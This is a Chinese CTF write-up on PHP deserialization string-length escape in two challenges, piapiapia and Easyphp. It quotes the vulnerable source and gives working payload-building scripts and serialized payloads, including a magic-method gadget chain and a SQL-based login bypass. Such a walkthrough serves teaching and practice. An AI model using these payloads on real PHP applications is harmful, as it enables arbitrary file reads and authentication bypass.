php反序列化逃逸例题两道

本文只讲反序列化(字符逃逸)部分,不包含解题全部流程。所谓字符逃逸,是指 serialize() 生成的字符串之后又经过了会改变长度的过滤/替换,而 s:N:"…" 里的长度前缀 N 并没有随之更新:unserialize() 仍然按 N 取字节,多出来的部分就会让我们放在字符串里的内容"逃出"字符串、被当作后续的序列化结构解析。下面两道题都是"替换后变长"的情况。

1 [0CTF 2016]piapiapia

先看漏洞点

profile.php

<?php  
    // profile.php (challenge source, quoted as-is): renders the stored profile
    // of the logged-in user. Two sinks matter for this write-up: the stored
    // profile is a PHP-serialized string that goes straight into
    // unserialize(), and the 'photo' field of the result is handed to
    // file_get_contents().
    require_once('class.php');  
    if($_SESSION['username'] == null) {  
       die('Login First');      
    }  
    $username = $_SESSION['username'];  
    // Serialized profile string for this user, read back verbatim from the
    // database (see show_profile()).
    $profile=$user->show_profile($username);  
    if($profile  == null) {  
       header('Location: update.php');  
    }  
    else {  
       // Sink 1: unserialize() of data that originally came from user input.
       $profile = unserialize($profile);  
       $phone = $profile['phone'];  
       $email = $profile['email'];  
       $nickname = $profile['nickname'];  
       // Sink 2: arbitrary file read -- whoever controls $profile['photo']
       // reads any file the web server can, and the content is echoed below
       // (base64-encoded) inside the <img> tag.
       $photo = base64_encode(file_get_contents($profile['photo']));  
?>  
<!DOCTYPE html>  
<html>  
<head>  
   <title>Profile</title>  
   <link href="static/bootstrap.min.css" rel="stylesheet">  
   <script src="static/jquery.min.js"></script>  
   <script src="static/bootstrap.min.js"></script>  
</head>  
<body>  
    <div class="container" style="margin-top:100px">    
<img src="data:image/gif;base64,<?php echo $photo; ?>" class="img-memeda " style="width:180px;margin:0px auto;">  
       <!-- nickname/phone/email are echoed without htmlspecialchars(): no output encoding (XSS), unrelated to the escape trick -->
       <h3>Hi <?php echo $nickname;?></h3>  
       <label>Phone: <?php echo $phone;?></label>  
       <label>Email: <?php echo $email;?></label>  
    </div></body>  
</html>  
<?php  
    }  
?>

漏洞点在

$profile = unserialize($profile);
$photo = base64_encode(file_get_contents($profile['photo']));

这里的 $profile 是之前保存到数据库里的序列化字符串;unserialize 之后 $profile['photo'] 被直接交给 file_get_contents,结果再经 base64 输出到页面上。因此只要能控制存储内容里的 photo 字段,就能读取服务器上的任意文件(比如 config.php)。(顺带一提,$nickname 等字段也未经 htmlspecialchars 就直接输出,但这与本题的逃逸无关。)
那么如何控制 $profile['photo']?
跟进 show_profile

/**
 * Returns the stored (serialized) profile string for $username, or whatever
 * parent::select() yields when there is no row (the caller treats null as
 * "no profile yet").
 *
 * $username goes through parent::filter() before being interpolated into the
 * WHERE clause; that filter rewrites quotes and backslashes, and is the only
 * protection this string-built query has. The returned profile itself is NOT
 * filtered on the way out: whatever was stored reaches unserialize() verbatim.
 */
public function show_profile($username) {  
    $username = parent::filter($username);  
  
    $where = "username = '$username'";  
    $object = parent::select($this->table, $where);  
    return $object->profile;  
}

跟进 filter

/**
 * The challenge's input "sanitizer". Two passes:
 *   1. every single quote and backslash becomes '_' (1 byte -> 1 byte);
 *   2. the words select/insert/update/delete/where (case-insensitive) become
 *      'hacker'.
 * Pass 2 is the bug this write-up is about: 'hacker' is 6 bytes, so the four
 * 6-byte keywords are replaced 1:1, but 'where' (5 bytes) GROWS by one byte
 * per occurrence. When, as in this challenge, the filtered text is a
 * serialize() result, the s:N:"..." length prefixes were computed before the
 * replacement and no longer match the data that follows them.
 */
public function filter($string) {  
    // '\\\\' in single quotes is the two-character regex \\, i.e. one literal backslash.
    $escape = array('\'', '\\\\');  
    $escape = '/' . implode('|', $escape) . '/';  
    $string = preg_replace($escape, '_', $string);  
  
    $safe = array('select', 'insert', 'update', 'delete', 'where');  
    $safe = '/' . implode('|', $safe) . '/i';  
    return preg_replace($safe, 'hacker', $string);  
}

注意两遍替换对长度的影响:单引号和反斜杠换成 _ 是 1 换 1,长度不变;select/insert/update/delete 都是 6 个字符,换成 6 个字符的 hacker 也不变;只有 where 是 5 个字符,每出现一次就多出 1 个字符。多一个字符有什么用?因为 serialize() 生成的 s:N:"…" 里的长度 N 是在过滤之前算好的,过滤之后 N 不再等于实际内容的长度——unserialize() 仍然只取 N 个字节当作这个字符串,剩下的内容就会被当成后续的序列化结构来解析。先看正常的序列化结果:
我们来看这段代码

<?php  
// Baseline: a "normal" profile, serialized. Every string is written as
// s:<byte length>:"<bytes>"; that length prefix is what the escape relies on.
$profile = [
    'phone'    => 'phone',
    'email'    => 'email',
    'nickname' => 'nickname',
    'photo'    => 'photo',
];
echo serialize($profile);
# a:4:{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:8:"nickname";s:5:"photo";s:5:"photo";}

如果我们构造

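<?php  
/**
 * Number of times $keyword must be repeated so that, after the filter turns
 * every $keyword into $replacement, the padding alone is as long as the
 * s:N: prefix serialize() wrote for padding + $tail. unserialize() then stops
 * right after the padding and reads $tail as real structure.
 *
 * @throws InvalidArgumentException when the growth per keyword does not divide
 *         strlen($tail) exactly (pick another keyword or adjust the tail).
 */
function escape_repeat_count(string $tail, string $keyword, string $replacement): int
{
    $growth = strlen($replacement) - strlen($keyword);
    if ($growth <= 0) {
        throw new InvalidArgumentException('replacement must be longer than keyword');
    }
    if (strlen($tail) % $growth !== 0) {
        throw new InvalidArgumentException("tail length must be a multiple of $growth");
    }
    return intdiv(strlen($tail), $growth);
}

// $tail must pick up exactly where serialize() stops inside the nickname
// value. nickname is a plain string here, so: close the string ('";'), supply
// the photo element, close the outer array ('}'). If nickname were submitted
// as an array instead, serialize() would wrap it in a:1:{i:0;...} and the
// tail would have to start with '";}' to close that inner array first.
$tail = '";s:5:"photo";s:10:"config.php";}';
// 'where' -> 'hacker' grows by 1 byte per copy, so 33 tail bytes need 33 copies.
$count = escape_repeat_count($tail, 'where', 'hacker');

$profile['phone'] = 'phone';  
$profile['email'] = 'email';  
$profile['nickname'] = str_repeat('where', $count) . $tail;  
$profile['photo'] = 'photo';  
  
echo(serialize($profile));  

# a:4:{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:198:"where...(33 copies, 165 bytes)...where";s:5:"photo";s:10:"config.php";}";s:5:"photo";s:5:"photo";}
# After the filter the 33 copies of "where" become 33 copies of "hacker" = 198 bytes, exactly the
# s:198: prefix, so the parser continues with '";s:5:"photo";s:10:"config.php";}' and photo becomes config.php.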

在正常情况下这没什么问题,但在这道题目中,序列化后的整个字符串还会再经过 filter(),where 会被替换为 hacker 而多出一个字符。关键在于:serialize() 写下的长度前缀 s:N: 是替换前算好的,替换后 unserialize() 仍然只取 N 个字节当作 nickname 的值,多出来的那一段就"逃逸"出了字符串,被当作新的序列化结构来解析。

以 nickname 为普通字符串、尾部为 ";s:5:"photo";s:10:"config.php";}(33 字节)为例:填充 33 个 where(165 字节),nickname 的长度前缀就是 s:198:。过滤后 33 个 where 变成 33 个 hacker,正好 198 字节:

a:4:{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:198:"hackerhacker…hacker(33 个,198 字节)";s:5:"photo";s:10:"config.php";}";s:5:"photo";s:5:"photo";}

解析器读完 198 字节的 hacker 后,接着读到的 ";s:5:"photo";s:10:"config.php";} 补齐了第 4 个元素并闭合数组,后面原来的 ";s:5:"photo";s:5:"photo";} 作为尾随数据被 unserialize 忽略:

a:4:{s:5:"phone";s:5:"phone";s:5:"email";s:5:"email";s:8:"nickname";s:198:"hackerhacker…hacker(33 个,198 字节)";s:5:"photo";s:10:"config.php";}

这样就成为了一个新的合法整体,photo 的值被我们控制为 config.php。注意尾部必须和 serialize() 停下来的位置严格衔接:如果 nickname 以数组形式提交(nickname[]=…,会序列化成 a:1:{i:0;s:N:"…";}),尾部要以 ";} 开头先闭合内层数组,此时尾部 34 字节、需要 34 个 where;如果 nickname 是普通字符串却仍使用 ";} 开头的尾部,外层 a:4: 在第 3 个元素后就遇到 },元素个数对不上,unserialize() 会直接返回 false。另外,尾部长度必须能被每次替换增加的字节数整除(这里 where→hacker 每次只增加 1 字节,所以任意长度的尾部都可以)。

2 [GYCTF2020]Easyphp

<?php  
// lib.php (challenge source, quoted as-is).
error_reporting(0);  
session_start();  
/**
 * Challenge "sanitizer": sequentially replaces each listed token with the
 * string 'hacker'. User::getNewInfo() applies it to the serialized Info
 * object AFTER serialize() has written the s:N: length prefixes, so any token
 * whose length differs from 6 changes the byte count without changing the
 * prefix. 'union' (5 -> 6 bytes) is the one used in this write-up; "'", '\'
 * and '*' would grow by 5, load/into/flag/file by 2, alter by 1. The quote
 * and backslash entries also mean the injected SQL cannot use single quotes.
 */
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
/**
 * Challenge class (quoted as-is). Three roles in this write-up:
 *  - update()/getNewInfo() are the entry point: POST age/nickname are
 *    serialized, run through safe(), and unserialize()d again;
 *  - __toString() is a gadget: echoing a User calls
 *    $this->nickname->update($this->age) on an attacker-chosen object;
 *  - __destruct() reads a file named by $this->nickname (not used by this chain).
 */
class User  
{  
    public $id;  
    public $age=null;  
    public $nickname=null;  
    // Normal login path; dbCtrl::login() decides, this only stores the id in the session.
    public function login() {  
        if(isset($_POST['username'])&&isset($_POST['password'])){  
        $mysqli=new dbCtrl();  
        $this->id=$mysqli->login('select id,password from user where username=?');  
        if($this->id){  
        $_SESSION['id']=$this->id;  
        $_SESSION['login']=1;  
        echo "你的ID是".$_SESSION['id'];  
        echo "你好!".$_SESSION['token'];  
        echo "<script>window.location.href='./update.php'</script>";  
        return $this->id;  
        }  
    }  
}  
    public function update(){  
        // unserialize() of the filtered POST data: this is where the escaped
        // object graph comes back to life. safe() runs AFTER serialize(), so
        // the s:N: prefixes were computed on the unfiltered text.
        $Info=unserialize($this->getNewinfo());  
        $age=$Info->age;  
        $nickname=$Info->nickname;  
        // The SQL string is never executed (UpdateHelper's constructor ignores
        // it), and UpdateHelper::__construct takes two parameters, not three.
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);  
        // This feature is unfinished; placeholder.
    }  
    public function getNewInfo(){  
        $age=$_POST['age'];  
        $nickname=$_POST['nickname'];  
        return safe(serialize(new Info($age,$nickname)));  
    }  
    public function __destruct(){  
        return file_get_contents($this->nickname);// dangerous: file read on a controllable name
    }  
    // Gadget: reached through "echo $this->sql" in UpdateHelper::__destruct.
    public function __toString()  
    {  
        $this->nickname->update($this->age);  
        return "0-0";  
    }  
}  
/**
 * Challenge class (quoted as-is). Instances are what getNewInfo() serializes;
 * the escape smuggles extra data into the third property, CtrlCase. __call()
 * is the gadget: any call to an undefined method (User::__toString calls
 * update(), which Info does not define) is forwarded as
 * CtrlCase->login(first argument), with CtrlCase taken from the payload.
 */
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
/**
 * Challenge class (quoted as-is). Start of the chain: when an instance is
 * destroyed, __destruct() echoes $this->sql; if $sql is an object with
 * __toString() (a User), that method runs. The payload stores an UpdateHelper
 * in Info::$CtrlCase, so it is destroyed together with the unserialized $Info
 * when User::update() returns.
 */
Class UpdateHelper{  
    public $id;  
    public $newinfo;  
    public $sql;  
    // Two parameters, but User::update() passes three: $newInfo receives the
    // session id (and is unserialize()d), $sql receives the Info object.
    // Nothing is assigned to $this->*, so $this->sql keeps whatever
    // unserialize() put there.
    public function __construct($newInfo,$sql){  
        $newInfo=unserialize($newInfo);  
        $upDate=new dbCtrl();  
    }  
    public function __destruct()  
    {  
        echo $this->sql;  
    }  
}  
/**
 * Challenge class (quoted as-is). Holds the DB credentials as public
 * properties (so they end up in any serialized copy) and does the login
 * check. In the chain, login() is reached through Info::__call with an
 * attacker-chosen $sql; the only bound parameter is $this->name, which the
 * payload also controls. The constructor is NOT run for objects created by
 * unserialize(), so $token is whatever the payload says (null below).
 */
class dbCtrl  
{  
    public $hostname="127.0.0.1";  
    public $dbuser="root";  
    public $dbpass="root";  
    public $database="test";  
    public $name;  
    public $password;  
    public $mysqli;  
    public $token;  
    public function __construct()  
    {  
        $this->name=$_POST['username'];  
        $this->password=$_POST['password'];  
        $this->token=$_SESSION['token'];  
    }  
    /**
     * Runs $sql (expected to yield id, password for username=?) and returns
     * the id on success, false otherwise.
     *
     * With the crafted query select 1,"<md5>" from user where username=?
     * $idResult is the constant 1 and $passwordResult a constant hash of a
     * password the attacker knows, so the md5 check passes for any existing
     * username and $_SESSION['token'] becomes $this->name ('admin').
     */
    public function login($sql)  
    {  
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);  
        if ($this->mysqli->connect_error) {  
            die("连接失败,错误:" . $this->mysqli->connect_error);  
        }  
        // $sql is trusted as given; only the single '?' is parameterized.
        $result=$this->mysqli->prepare($sql);  
        $result->bind_param('s', $this->name);  
        $result->execute();  
        $result->bind_result($idResult, $passwordResult);  
        $result->fetch();  
        $result->close();  
        // Once the session token is 'admin' the password is never checked;
        // a second, normal login relies on this after the chain has run.
        if ($this->token=='admin') {  
            return $idResult;  
        }  
        if (!$idResult) {  
            echo('用户不存在!');  
            return false;  
        }  
        // Unsalted md5, compared as a plain string.
        if (md5($this->password)!==$passwordResult) {  
            echo('密码错误!');  
            return false;  
        }  
        $_SESSION['token']=$this->name;  
        return $idResult;  
    }  
    public function update($sql)  
    {  
        // Not implemented yet.
    }  
}
<?php  
// update.php (challenge source, quoted as-is): drives User::update() and
// prints the flag once the session is marked as logged in.
require_once('lib.php');  
echo '<html>  
<meta charset="utf-8">  
<title>update</title>  
<h2>这是一个未完成的页面,上线时建议删除本页面</h2>  
</html>';  
// Only prints a message -- there is no exit, so the unserialize() inside
// User::update() below is reachable without being logged in at all.
if ($_SESSION['login']!=1){  
    echo "你还没有登陆呢!";  
}  
$users=new User();  
$users->update();  
// Strict comparison with int 1, which is exactly what User::login() stores.
if($_SESSION['login']===1){  
    require_once("flag.php");  
    echo $flag;  
}  
  
?>

先构造反序列化链。从代码里能串起来的触发路径是:UpdateHelper::__destruct 执行 echo $this->sql → 若 sql 是 User 对象则触发 User::__toString → 调用 $this->nickname->update($this->age) → nickname 是 Info,而 Info 没有 update 方法,于是进入 Info::__call → 调用 $this->CtrlCase->login($argument[0]) → CtrlCase 是 dbCtrl,login() 会用我们传入的 SQL 做 prepare,并把 $this->name 绑定给唯一的 ?。把这条链塞进 update() 里 unserialize 出来的那个 Info 的 CtrlCase 属性,$Info 离开作用域时 UpdateHelper 的析构函数就会启动整条链。

<?php  
// Local harness: the server-side classes are reproduced below so the payload
// can be built with serialize(). Mirror lib.php's prologue (notices off,
// session started).
error_reporting(0);  
session_start();  
/**
 * Sequential, left-to-right replacement of every blacklisted token with
 * 'hacker' (equivalent to str_replace() with an array of needles).
 */
function safe($parm){  
    $needles = ['union', 'regexp', 'load', 'into', 'flag', 'file', 'insert', "'", '\\', '*', 'alter'];
    foreach ($needles as $needle) {
        $parm = str_replace($needle, 'hacker', $parm);
    }
    return $parm;
}  
/**
 * Local copy of the challenge's User class, used only so the payload below
 * serializes with the same class and property names. Property declaration
 * order (id, age, nickname) is part of serialize()'s output -- keep it.
 * The magic methods are kept as well, so the same __destruct/__toString
 * chain fires locally when the script's objects are destroyed; the resulting
 * errors are hidden by error_reporting(0).
 */
class User  
{  
    public $id;  
    public $age=null;  
    public $nickname=null;  
    public function login() {  
        if(isset($_POST['username'])&&isset($_POST['password'])){  
            $mysqli=new dbCtrl();  
            $this->id=$mysqli->login('select id,password from user where username=?');  
            if($this->id){  
                $_SESSION['id']=$this->id;  
                $_SESSION['login']=1;  
                echo "你的ID是".$_SESSION['id'];  
                echo "你好!".$_SESSION['token'];  
                echo "<script>window.location.href='./update.php'</script>";  
                return $this->id;  
            }  
        }  
    }  
    public function update(){  
        $Info=unserialize($this->getNewinfo());  
        $age=$Info->age;  
        $nickname=$Info->nickname;  
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);  
        // This feature is unfinished; placeholder.
    }  
    public function getNewInfo(){  
        $age=$_POST['age'];  
        $nickname=$_POST['nickname'];  
        return safe(serialize(new Info($age,$nickname)));  
    }  
    public function __destruct(){  
        return file_get_contents($this->nickname);// dangerous: file read on a controllable name
    }  
    // Gadget: "echo $user" -> $this->nickname->update($this->age).
    public function __toString()  
    {  
        $this->nickname->update($this->age);  
        return "0-0";  
    }  
}  
/**
 * Local copy of Info with the constructor removed, so `new Info()` below can
 * be created empty and have only CtrlCase assigned. Property order (age,
 * nickname, CtrlCase) is part of the serialized form -- do not reorder.
 */
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    // Forwards any undefined method call to CtrlCase->login(first argument).
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}
/**
 * Local copy of UpdateHelper with the constructor removed, so it can be
 * created with `new UpdateHelper()` and have only $sql assigned. Its
 * __destruct() is the first link of the chain: echoing an object invokes
 * its __toString().
 */
Class UpdateHelper{  
    public $id;  
    public $newinfo;  
    public $sql;  
  
    public function __destruct()  
    {  
        echo $this->sql;  
    }  
}  
/**
 * Local copy of dbCtrl with the constructor removed (the real one reads
 * $_POST and $_SESSION). Only name and password need to be set in the
 * payload: server-side, unserialize() fills every property that is missing
 * from the payload from the class defaults (hostname, dbuser, ...).
 */
class dbCtrl  
{  
    public $hostname="127.0.0.1";  
    public $dbuser="root";  
    public $dbpass="root";  
    public $database="test";  
    public $name;  
    public $password;  
    public $mysqli;  
    public $token;  
  
    // Unchanged from the challenge; reached via Info::__call with an
    // attacker-chosen $sql, only $this->name is bound as a parameter.
    public function login($sql)  
    {  
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);  
        if ($this->mysqli->connect_error) {  
            die("连接失败,错误:" . $this->mysqli->connect_error);  
        }  
        $result=$this->mysqli->prepare($sql);  
        $result->bind_param('s', $this->name);  
        $result->execute();  
        $result->bind_result($idResult, $passwordResult);  
        $result->fetch();  
        $result->close();  
        // token == 'admin' skips the password check entirely.
        if ($this->token=='admin') {  
            return $idResult;  
        }  
        if (!$idResult) {  
            echo('用户不存在!');  
            return false;  
        }  
        if (md5($this->password)!==$passwordResult) {  
            echo('密码错误!');  
            return false;  
        }  
        // On success the token becomes the username we bound ('admin').
        $_SESSION['token']=$this->name;  
        return $idResult;  
    }  
    public function update($sql)  
    {  
        // Not implemented yet.
    }  
}  
  
  
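// Build the POP chain, outermost gadget first:
//   UpdateHelper::__destruct  -> echo $this->sql
//   User::__toString          -> $this->nickname->update($this->age)
//   Info::__call('update')    -> $this->CtrlCase->login($argument[0])
//   dbCtrl::login($sql)       -> prepare()s our SQL, binds $this->name to the '?'
$pop = new UpdateHelper();  
$pop->sql = new User();
// Our SQL makes login() fetch a constant id (1) and a constant "password hash"
// for ANY existing username, so the md5($this->password) check is compared
// against a hash we chose: c4ca4238a0b923820dcc509a6f75849b is md5('1').
// Double quotes only -- safe() rewrites single quotes, and this whole object
// is itself run through safe() on the server.
$pop->sql->age = 'select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?';  
$pop->sql->nickname = new Info();
$pop->sql->nickname->CtrlCase = new dbCtrl();  
// On success login() does $_SESSION['token'] = $this->name; with 'admin' the
// token check at the top of login() then bypasses the password for good.
$pop->sql->nickname->CtrlCase->name = 'admin';  
$pop->sql->nickname->CtrlCase->password = '1';  

// Drop the declared-but-unused properties so serialize() emits only what the
// chain needs; server-side, unserialize() restores hostname, dbuser, ... from
// the class defaults. This is what makes the output match the comment below
// and keeps the padding in the next step as short as possible.
unset($pop->id, $pop->newinfo);
unset($pop->sql->id);
unset($pop->sql->nickname->age, $pop->sql->nickname->nickname);
unset(
    $pop->sql->nickname->CtrlCase->hostname,
    $pop->sql->nickname->CtrlCase->dbuser,
    $pop->sql->nickname->CtrlCase->dbpass,
    $pop->sql->nickname->CtrlCase->database,
    $pop->sql->nickname->CtrlCase->mysqli,
    $pop->sql->nickname->CtrlCase->token
);

$payload = serialize($pop);
// The server runs safe() over the serialized Info that carries this payload;
// if safe() rewrote anything in here, the payload's own s:N: prefixes would be
// the ones going out of sync. Refuse to print a payload that would not survive.
if (safe($payload) !== $payload) {
    fwrite(STDERR, "payload contains a token that safe() rewrites\n");
    exit(1);
}
echo urlencode($payload);
// NOTE: when the script ends $pop is destroyed and the same destructor chain
// runs locally (UpdateHelper -> User -> Info -> dbCtrl::login, including a
// mysqli connection attempt); that noise is expected and hidden by
// error_reporting(0) -- the payload has already been printed by then.
# O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}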
<?php  
/**
 * Sequential, left-to-right replacement of every blacklisted token with
 * 'hacker' (equivalent to str_replace() with an array of needles).
 */
function safe($parm){  
    $needles = ['union', 'regexp', 'load', 'into', 'flag', 'file', 'insert', "'", '\\', '*', 'alter'];
    foreach ($needles as $needle) {
        $parm = str_replace($needle, 'hacker', $parm);
    }
    return $parm;
}  
/**
 * Local copy of the server's Info class, with the constructor that
 * getNewInfo() calls. Property order is part of the serialized form and
 * must stay age, nickname, CtrlCase.
 */
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        $target = $this->CtrlCase;
        echo $target->login($argument[0]);  
    }  
}  
  
// Baseline: what the server serializes for age=1, nickname=1 before safe()
// touches it. Info declares three properties, so CtrlCase is emitted as N;
// (null) even though the constructor never sets it -- that third slot is
// where the next step smuggles the chain in.
$pop = new Info('1', '1');  
$serialized = serialize($pop);
echo urlencode($serialized);
# O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1:"1";s:8:"CtrlCase";N;}
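<?php  
/**
 * Local copy of the server's Info class (property order matters for the
 * serialized form: age, nickname, CtrlCase).
 */
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  

/**
 * Number of $keyword repetitions needed so that, once safe() has rewritten
 * every $keyword as $replacement, the padding alone is as long as the s:N:
 * prefix serialize() wrote for padding + $tail. unserialize() then stops right
 * after the padding and reads $tail as real structure.
 *
 * @throws InvalidArgumentException if the growth per keyword does not divide
 *         strlen($tail) exactly (choose another keyword or adjust the tail).
 */
function escape_repeat_count(string $tail, string $keyword, string $replacement): int
{
    $growth = strlen($replacement) - strlen($keyword);
    if ($growth <= 0) {
        throw new InvalidArgumentException('replacement must be longer than keyword');
    }
    if (strlen($tail) % $growth !== 0) {
        throw new InvalidArgumentException("tail length must be a multiple of $growth");
    }
    return intdiv(strlen($tail), $growth);
}

// The gadget chain exactly as the previous script printed it
// (UpdateHelper -> User -> Info ->dbCtrl), 245 bytes.
$chain = 'O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}';
// The tail has to pick up exactly where serialize() stops inside the nickname
// value: close the string ('";'), supply the CtrlCase property, and close the
// Info object ('}'). If $chain changes (e.g. a harness that also emits the
// null properties), the repeat count below follows automatically.
$tail = '";s:8:"CtrlCase";' . $chain . '}';

// 'union' (5 bytes) -> 'hacker' (6 bytes) grows by 1 per copy, so one copy per
// tail byte: 263 copies here, which yields the s:1578: prefix shown below.
$count = escape_repeat_count($tail, 'union', 'hacker');
$pop = new Info('1', str_repeat('union', $count) . $tail);  
  
echo(urlencode(serialize($pop)));
#O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1578:"union...(263 copies, 1315 bytes)...union";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}";s:8:"CtrlCase";N;}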

经过 safe() 后每个 union 被替换为 hacker,各多出 1 个字节,整个字符串变成:

O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1578:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}";s:8:"CtrlCase";N;}

263 个 union 被替换成 263 个 hacker,正好 1578 字节,与过滤前算好的 s:1578: 前缀吻合。于是原本属于 nickname 字符串一部分的 ";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}
被当作真正的序列化结构解析,造成逃逸:先用 "; 闭合 nickname 字符串,再把 CtrlCase 设为我们构造的 UpdateHelper 对象,最后用 } 闭合 Info;后面多余的 ";s:8:"CtrlCase";N;} 作为尾随数据被 unserialize 忽略。尾部长度 263 = 17(";s:8:"CtrlCase";)+ 245(对象链)+ 1(}),因为 union→hacker 每次只增加 1 字节,所以需要 263 个 union;如果换用其他被过滤的词(如 load/into/flag/file 每次增加 2 字节,'、\、* 每次增加 5 字节),尾部长度就必须能被对应的增量整除。之后 $Info 离开作用域,其 CtrlCase 里的 UpdateHelper 被销毁,析构函数触发前面的链,dbCtrl::login 用我们给的 SQL 和 name=admin 把 $_SESSION['token'] 设为 admin。